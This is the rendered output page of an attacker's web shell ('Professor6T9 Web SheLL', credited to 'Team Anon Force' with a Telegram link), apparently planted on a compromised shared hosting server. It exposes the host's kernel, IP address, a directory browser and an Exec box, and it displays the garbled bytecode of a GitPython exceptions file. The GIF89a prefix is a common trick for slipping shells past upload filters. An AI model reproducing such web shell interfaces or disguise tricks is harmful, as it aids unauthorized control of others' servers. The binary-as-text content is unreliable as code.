GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
proc
/
thread-self
/
root
/
opt
/
cloudlinux
/
venv
/
lib64
/
python3.11
/
site-packages
/
git
/
__pycache__
[ HOME ]
Exec
Submit
exc.cpython-311.pyc
� �|oi. � � � d Z ddlmZ ddlT ddlmZ ddlmZ ddlmZm Z m Z mZmZ ddl mZ erddlmZ G d � d e� � Z G d� de� � Z G d � de� � Z G d� dee� � Z G d� de� � Z G d� de� � Z G d� de� � Z G d� de� � Z G d� de� � Z G d� de� � Z G d� de� � Z G d� d e� � Z G d!� d"e� � Z G d#� d$e� � Z d%S )&zE Module containing all exceptions thrown throughout the git package, � )�BadName)�*��safe_decode)�remove_password_if_present)�List�Sequence�Tuple�Union� TYPE_CHECKING)�PathLike)�Repoc � � e Zd ZdZdS )�GitErrorz%Base class for all package exceptionsN��__name__� __module__�__qualname__�__doc__� � �Y/builddir/build/BUILD/cloudlinux-venv-1.0.10/venv/lib/python3.11/site-packages/git/exc.pyr r s � � � � � �/�/�/�/r r c � � e Zd ZdZdS )�InvalidGitRepositoryErrorzAThrown if the given repository appears to have an invalid format.Nr r r r r r s � � � � � �K�K�K�Kr r c � � e Zd ZdZdS )�WorkTreeRepositoryUnsupportedz9Thrown to indicate we can't handle work tree repositoriesNr r r r r r s � � � � � �C�C�C�Cr r c � � e Zd ZdZdS )�NoSuchPathErrorz3Thrown if a path could not be access by the system.Nr r r r r r $ s � � � � � �=�=�=�=r r c � � e Zd ZdZdS )�UnsafeProtocolErrorzGThrown if unsafe protocols are passed without being explicitly allowed.Nr r r r r r ( s � � � � � �Q�Q�Q�Qr r c � � e Zd ZdZdS )�UnsafeOptionErrorzEThrown if unsafe options are passed without being explicitly allowed.Nr r r r r"